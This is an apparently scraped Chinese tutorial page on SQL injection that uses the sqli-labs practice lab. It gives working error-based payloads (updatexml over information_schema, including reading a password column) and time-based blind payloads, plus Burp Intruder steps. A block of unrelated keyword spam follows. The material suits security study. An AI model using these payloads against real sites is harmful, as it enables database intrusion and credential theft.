千家信息网

请输入关键字词

热门搜索排行

最新搜索排行

导航: 首页 > 互联网科技 >

sql注入漏洞报错注入和盲注是怎么样的

发表于:2025-12-02 作者:千家信息网编辑
千家信息网最后更新 2025年12月02日,今天就跟大家聊聊有关 sql注入漏洞报错注入和盲注是怎么样的,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。环境:sqli的第一关用的szx.p
千家信息网最后更新 2025年12月02日sql注入漏洞报错注入和盲注是怎么样的

今天就跟大家聊聊有关 sql注入漏洞报错注入和盲注是怎么样的,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。

环境:sqli的第一关用的szx.php

一、报错注入

1、获取数据库名称,通过修改limit 后面的值获取不同的数据库名称

http://192.168.1.129/sqli/Less-1/?id=1' and updatexml(1,(select concat(0x7e, (schema_name),0x7e) FROM information_schema.schemata limit 2,1),1) -- +

2、获取数据库中的表,指定数据库名称,通过修改limit 后面的值获取不同的表名

http://127.0.0.1/sqli/Less-1/?id=1' and updatexml(1,(select concat(0x7e, (table_name),0x7e) from information_schema.tables where table_schema='jay' limit 2,1),1) -- +

3、获取表字段,指定表名并转为十六进制形式,通过修改limit 后面的值获取不同的表字段

http://192.168.1.129/sqli/Less-1/?id=1' and updatexml(1,(select concat(0x7e, (column_name),0x7e) from information_schema.columns where table_name=0x75736572 limit 1,1),1) -- +

4、获取字段内容,指定数据库字段和表名称,通过修改limit 后面的值获取不同的字段内容

http://192.168.1.129/sqli/Less-1/?id=1'  and updatexml(1,(select concat(0x7e, pass,0x7e) from jay.user limit 1,1),1) -- +

二、盲注

1、获取数据库长度,如果数据长度大于等于2等待5秒,如果小于2不做任何操作,修改该数值判断数据库长度

http://192.168.1.129/php/szx.php?id=1 and (select (if(length(database())>2,sleep(5),null)))#

2、获取数据库名称

如果数据名称左边第一个是'j',多停留1面,如果不是多停留5秒,修改该字符判断数据库名称

http://192.168.1.129/php/szx.php?id=1 and If(left(database(),1)='j',1,sleep(5))

如果数据名称左边第一个是106,ascii码是'j',多停留1面,如果不是多停留5秒,修改该字符判断数据库名称

http://192.168.1.129/php/szx.php?id=1 and If(ascii(substr(database(),1,1))=106,sleep(1),sleep(5))

三、Burpsuit探测(盲注)

1、抓包发送到Intruder模块,并设置好变量

2、设置payload,ASCII中a-z是97-122,设置步长为1

3、start attack,只有106的时间是2000,其他时间都是5000多,说明第一个位数字的ASCII码是106,依次类推获取其他位置的信息

看完上述内容,你们对 sql注入漏洞报错注入和盲注是怎么样的有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注行业资讯频道,感谢大家的支持。

很赞哦!
数据 数据库 名称 内容 字段 不同 长度 漏洞 字符 时间 位置 信息 十六进制 变量 只有 形式 数值 数字 更多 模块 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 战地1 没服务器 易语言 数据库 插入 yjk服务器没有响应 数据库可以看成是什么与什么 数据库检测语句 db2数据库电子书下载 武汉亘知网络技术有限公司 孙老师服务器搭配视频 做金融软件开发违法吗 品聘插件的服务器地址 司法局网络安全工作报告 华为分包商网络安全答案 多cpu服务器组装图片 易管网数据库打不开 怎么把光影加到我的世界服务器 snkrs会员服务器出错 软件开发服务计量单位是什么 网络安全主线有哪些 用友软件开发费 服务器 网站群服务器 华住数据库 百度云 数据库设计及工具 服务器开关在哪 摄像机存储ftp服务器 机房服务器发展历史 机器人服务器分配 软件开发服务计量单位是什么 vfp数据库建立感悟 eric数据库文献 昆明软件开发排名

相关文章

0